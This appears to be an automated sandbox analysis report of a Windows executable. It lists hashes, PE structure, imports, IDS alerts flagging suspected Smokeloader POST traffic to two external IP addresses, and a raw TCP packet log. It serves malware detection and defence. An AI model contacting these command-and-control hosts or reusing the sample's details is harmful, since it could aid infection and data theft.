SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.617071692398502
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FyDBXJE74v.exe
File size:	296'960 bytes
MD5:	497859eed941e073a43e8291908e6494
SHA1:	8136e8e148deeb6c9d18f8300f47e7b3a43b4290
SHA256:	8484619768f32fb9368cc46bc15a16cf99c98e95a2a605068adf5dd71090e0c7
SHA512:	5e5af6d5d1802aad3160e8a139134c5cc39d6d3b10ae0acbe686a1fef9944d36cba20081781abfead68f3b6e37de4182178fa293c16b6994473a6d869c9d7a06
SSDEEP:	3072:ohQBX24upVVQN58sfUAJ5IpCyxF9DavUjZXFUCIqzpZAqa8i:oqFseN58u8/4OXFVIqzpZAqaR
TLSH:	D754D78252E56C03EFB64B328E39D9D8262EFD724E3572DEB1047A0F147B1A5E513B12
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..K}...}...}...c.x.f...c.i.m...c...7...Z...z...}.......c.v.\|...c.h.\|...c.m.\|...Rich}...........PE..L...\|OXe.................T.

File Icon


Icon Hash:	738733b18b838be4

Static PE Info

General

Entrypoint:	0x4018e4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65584F7C [Sat Nov 18 05:45:32 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	67def8961050d10da5ff74312b7f0aec

Entrypoint Preview

Instruction
call 00007FD9EC80A790h
jmp 00007FD9EC80708Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041B3D0h], eax
mov dword ptr [0041B3CCh], ecx
mov dword ptr [0041B3C8h], edx
mov dword ptr [0041B3C4h], ebx
mov dword ptr [0041B3C0h], esi
mov dword ptr [0041B3BCh], edi
mov word ptr [0041B3E8h], ss
mov word ptr [0041B3DCh], cs
mov word ptr [0041B3B8h], ds
mov word ptr [0041B3B4h], es
mov word ptr [0041B3B0h], fs
mov word ptr [0041B3ACh], gs
pushfd
pop dword ptr [0041B3E0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041B3D4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041B3D8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041B3E4h], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041B320h], 00010001h
mov eax, dword ptr [0041B3D8h]
mov dword ptr [0041B2D4h], eax
mov dword ptr [0041B2C8h], C0000409h
mov dword ptr [0041B2CCh], 00000001h
mov eax, dword ptr [0041A008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041A00Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000E8h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18724	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2722000	0x29810	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x17000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1536f	0x15400	d9f6f2e355da13b0605c446f69f8ab36	False	0.8254940257352941	data	7.557544545964827	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x17000	0x2026	0x2200	015eea173e4482b2da1d23e4e48ecb46	False	0.36144301470588236	data	5.426629733611342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x26fff7c	0x1400	c0c063eabbb97a813e07a4dc77f29fa1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.kibojis	0x271a000	0x4400	0x3800	b211778b80f6d441b6cf61ada776fc6d	False	0.0025809151785714285	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.xeto	0x271f000	0x2800	0x2800	1276481102f218c981e0324180bafd9f	False	0.00322265625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2722000	0x29810	0x29a00	ac1373b8d4a9736ee5e17d763fc3f5d3	False	0.3729588963963964	data	4.765772210605211	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x27400a8	0x2	data			5.0
RT_CURSOR	0x27400b0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4276315789473684
RT_CURSOR	0x27401f8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x2740328	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x27428f8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_CURSOR	0x27437b8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x27438e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x2722e00	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5674307036247335
RT_ICON	0x2723ca8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6376353790613718
RT_ICON	0x2724550	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6849078341013825
RT_ICON	0x2724c18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7456647398843931
RT_ICON	0x2725180	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.512863070539419
RT_ICON	0x2727728	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6137429643527205
RT_ICON	0x27287d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6163934426229508
RT_ICON	0x2729158	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7553191489361702
RT_ICON	0x2729638	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3363539445628998
RT_ICON	0x272a4e0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.523014440433213
RT_ICON	0x272ad88	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5829493087557603
RT_ICON	0x272b450	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6315028901734104
RT_ICON	0x272b9b8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.42728215767634853
RT_ICON	0x272df60	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5045081967213115
RT_ICON	0x272e8e8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.5026595744680851
RT_ICON	0x272edb8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.3350213219616205
RT_ICON	0x272fc60	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.388086642599278
RT_ICON	0x2730508	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.39285714285714285
RT_ICON	0x2730bd0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.40534682080924855
RT_ICON	0x2731138	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.21950207468879668
RT_ICON	0x27336e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.2474202626641651
RT_ICON	0x2734788	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.2815573770491803
RT_ICON	0x2735110	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.31117021276595747
RT_ICON	0x27355f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39285714285714285
RT_ICON	0x2736498	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5537003610108303
RT_ICON	0x2736d40	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6226958525345622
RT_ICON	0x2737408	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6372832369942196
RT_ICON	0x2737970	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.425422138836773
RT_ICON	0x2738a18	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4209016393442623
RT_ICON	0x27393a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.46187943262411346
RT_ICON	0x2739870	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.279317697228145
RT_ICON	0x273a718	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.3664259927797834
RT_ICON	0x273afc0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.3773041474654378
RT_ICON	0x273b688	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.3764450867052023
RT_ICON	0x273bbf0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.2587136929460581
RT_ICON	0x273e198	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.27345215759849906
RT_ICON	0x273f240	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.28852459016393445
RT_ICON	0x273fbc8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.32180851063829785
RT_STRING	0x2746070	0xaa	data			0.5588235294117647
RT_STRING	0x2746120	0x600	data			0.4361979166666667
RT_STRING	0x2746720	0x460	data			0.45
RT_STRING	0x2746b80	0x64a	data			0.4360248447204969
RT_STRING	0x27471d0	0x7b8	data			0.4185222672064777
RT_STRING	0x2747988	0x6d0	data			0.4294724770642202
RT_STRING	0x2748058	0x76c	data			0.42526315789473684
RT_STRING	0x27487c8	0x606	data			0.4455252918287938
RT_STRING	0x2748dd0	0x7c2	data			0.42245720040281975
RT_STRING	0x2749598	0x810	data			0.42102713178294576
RT_STRING	0x2749da8	0x584	data			0.4461756373937677
RT_STRING	0x274a330	0x74c	data			0.4234475374732334
RT_STRING	0x274aa80	0x710	data			0.4303097345132743
RT_STRING	0x274b190	0x5f6	data			0.4325032765399738
RT_STRING	0x274b788	0x88	data			0.625
RT_GROUP_CURSOR	0x27401e0	0x14	data			1.15
RT_GROUP_CURSOR	0x27428d0	0x22	data			1.088235294117647
RT_GROUP_CURSOR	0x27437a0	0x14	data			1.25
RT_GROUP_CURSOR	0x2745e90	0x22	data			1.088235294117647
RT_GROUP_ICON	0x272ed50	0x68	data	Turkish	Turkey	0.7019230769230769
RT_GROUP_ICON	0x2735578	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x2740030	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x27295c0	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x2739808	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x2745eb8	0x1b4	data			0.5871559633027523

Imports

DLL	Import
KERNEL32.dll	OpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, GetTimeFormatW, DeleteVolumeMountPointA, GetFileAttributesW, GetBinaryTypeA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SearchPathW, GetConsoleAliasExesLengthA, SetConsoleMode, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
GDI32.dll	GetBoundsRect
ADVAPI32.dll	ClearEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-13T17:02:34.009237+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49736	78.89.199.216	80	TCP
2024-10-13T17:02:35.260507+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49737	78.89.199.216	80	TCP
2024-10-13T17:02:36.675576+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49738	78.89.199.216	80	TCP
2024-10-13T17:02:37.879607+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49739	78.89.199.216	80	TCP
2024-10-13T17:02:39.110270+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49740	78.89.199.216	80	TCP
2024-10-13T17:02:40.315350+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49741	78.89.199.216	80	TCP
2024-10-13T17:02:41.719962+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49742	78.89.199.216	80	TCP
2024-10-13T17:02:43.127590+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49743	78.89.199.216	80	TCP
2024-10-13T17:02:44.418920+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49744	78.89.199.216	80	TCP
2024-10-13T17:02:45.652054+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49745	78.89.199.216	80	TCP
2024-10-13T17:02:46.866023+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49746	78.89.199.216	80	TCP
2024-10-13T17:02:48.088816+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49747	78.89.199.216	80	TCP
2024-10-13T17:02:49.324243+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49748	78.89.199.216	80	TCP
2024-10-13T17:02:50.631889+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49749	78.89.199.216	80	TCP
2024-10-13T17:02:51.847825+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49750	78.89.199.216	80	TCP
2024-10-13T17:02:53.053024+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49751	78.89.199.216	80	TCP
2024-10-13T17:02:54.269862+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49752	78.89.199.216	80	TCP
2024-10-13T17:02:55.483123+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49753	78.89.199.216	80	TCP
2024-10-13T17:02:56.676550+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49754	78.89.199.216	80	TCP
2024-10-13T17:02:58.136557+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49756	78.89.199.216	80	TCP
2024-10-13T17:02:59.375455+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49768	78.89.199.216	80	TCP
2024-10-13T17:03:00.567671+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49774	78.89.199.216	80	TCP
2024-10-13T17:03:01.795567+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49785	78.89.199.216	80	TCP
2024-10-13T17:03:03.055928+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49794	78.89.199.216	80	TCP
2024-10-13T17:03:04.302004+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49802	78.89.199.216	80	TCP
2024-10-13T17:03:05.654853+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49810	78.89.199.216	80	TCP
2024-10-13T17:03:06.907800+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49819	78.89.199.216	80	TCP
2024-10-13T17:03:08.190298+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49828	78.89.199.216	80	TCP
2024-10-13T17:03:09.445903+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49836	78.89.199.216	80	TCP
2024-10-13T17:03:10.849624+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49845	78.89.199.216	80	TCP
2024-10-13T17:03:12.157474+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49856	78.89.199.216	80	TCP
2024-10-13T17:03:13.543698+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49864	78.89.199.216	80	TCP
2024-10-13T17:03:14.797727+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49873	78.89.199.216	80	TCP
2024-10-13T17:03:15.976762+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49882	78.89.199.216	80	TCP
2024-10-13T17:03:17.244744+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49890	78.89.199.216	80	TCP
2024-10-13T17:03:18.612428+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49896	78.89.199.216	80	TCP
2024-10-13T17:04:28.029229+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50038	78.89.199.216	80	TCP
2024-10-13T17:04:34.140280+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50039	78.89.199.216	80	TCP
2024-10-13T17:04:39.391353+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50040	78.89.199.216	80	TCP
2024-10-13T17:04:44.509898+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50041	78.89.199.216	80	TCP
2024-10-13T17:04:50.069868+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50042	78.89.199.216	80	TCP
2024-10-13T17:04:55.760104+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50043	78.89.199.216	80	TCP
2024-10-13T17:05:01.475818+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50044	78.89.199.216	80	TCP
2024-10-13T17:05:06.987167+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50045	109.175.29.39	80	TCP
2024-10-13T17:05:11.639706+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50046	109.175.29.39	80	TCP
2024-10-13T17:05:16.825285+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50047	109.175.29.39	80	TCP
2024-10-13T17:05:23.062242+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50048	109.175.29.39	80	TCP
2024-10-13T17:05:28.723373+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50049	109.175.29.39	80	TCP
2024-10-13T17:05:34.540144+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50050	109.175.29.39	80	TCP
2024-10-13T17:05:40.583026+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50051	109.175.29.39	80	TCP
2024-10-13T17:05:45.894239+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50052	109.175.29.39	80	TCP
2024-10-13T17:05:50.727891+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50053	109.175.29.39	80	TCP
2024-10-13T17:05:56.082119+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50054	109.175.29.39	80	TCP
2024-10-13T17:06:01.188741+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50055	109.175.29.39	80	TCP
2024-10-13T17:06:06.774445+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50056	109.175.29.39	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 17:02:32.560286999 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:32.566359997 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:32.566431046 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:32.576184988 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:32.576219082 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:32.581362963 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:32.581377029 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:34.009001017 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:34.009186029 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:34.009237051 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:34.013793945 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:34.015855074 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:34.018697023 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:34.020775080 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:34.020849943 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:34.020936966 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:34.020936966 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:34.025847912 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:34.026043892 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:35.259593964 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:35.259953976 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:35.260507107 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:35.260507107 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:35.263489008 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:35.266388893 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:35.268676043 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:35.268934011 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:35.269042015 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:35.269079924 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:35.273986101 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:35.274315119 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:36.674861908 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:36.675302982 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:36.675575972 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:36.675885916 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:36.680715084 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:36.683495045 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:36.688721895 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:36.688817024 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:36.688941956 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:36.688975096 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:36.694111109 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:36.694417953 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:37.879072905 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:37.879406929 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:37.879606962 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:37.879607916 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:37.882751942 CEST	49740	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:37.884685993 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:37.887845993 CEST	80	49740	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:37.887921095 CEST	49740	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:37.888127089 CEST	49740	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:37.888159037 CEST	49740	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:37.893713951 CEST	80	49740	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:37.893760920 CEST	80	49740	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:39.110152006 CEST	80	49740	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:39.110207081 CEST	80	49740	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:39.110270023 CEST	49740	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:39.110418081 CEST	49740	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:39.112994909 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:39.115324974 CEST	80	49740	78.89.199.216	192.168.2.4
